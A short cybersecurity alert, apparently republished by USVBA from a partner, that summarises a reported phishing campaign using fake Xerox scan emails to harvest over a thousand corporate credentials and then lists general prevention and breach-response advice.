Check Point Research and Otorio published a blog post describing the campaign, in which stolen information was dumped on compromised WordPress domains.   The recent phishing attack began with one of several fraudulent email templates and would mimic Xerox/Xeros scan notifications including a target company employee’s name or title in the subject line.   The phishing messages originated from a Linux server hosted on Microsoft Azure and were sent through PHP Mailer and 1&1 email servers. Spam was also sent through email accounts that had been previously compromised to make messages appear to be from legitimate sources.   The attack included an attached HTML file containing embedded JavaScript code that had one function: covert background checks of password use. When credential input was detected, they would be harvested and users would be sent to legitimate login pages.

The attack successfully bypassed Microsoft Office 365 Advanced Threat Protection (ATP) filtering and stole over a thousand corporate employees’ credentials.  The stolen user data was sent to these servers where it was saved in files that were public and were indexed by Google thus allowing anyone to view them through a simple search.   Attackers usually prefer to use compromised servers instead of their own infrastructure because of the existing websites’ well-known reputations.  The more widely recognized a reputation is, the chances are higher that the email will not be blocked by security vendors

Based on a subset of roughly 500 stolen credentials, the researchers found a wide range of target industries, including IT, healthcare, real estate, and manufacturing. However, it appears that the threat actors have a particular interest in construction and energy.

What to do?

  • Ensure your network security software is up to date and active.
  • Conduct routine employee training on cyber threats and techniques such as phishing
  • Perform routine system checks to identify any possible breaches.
  • Perform routine backups and store copies off site in a secure location.

What can you do to when this happens to you?

  • If you determine your network has been breached and/or compromised, immediately shut down and identify any malware present.
  • Determine if any data has been modified or exfiltrated.
  • If data has been stolen notify all parties affected including local law enforcement data crimes division and the FBI,
  • Reinstate the network from a known “clean” backup


This phishing scam left thousands of stolen passwords exposed through Google search | ZDNet

“This USVBA Cyber Alert is provided by our partner, 171 Comply. Please visit their website to learn more about CMMC and their services.”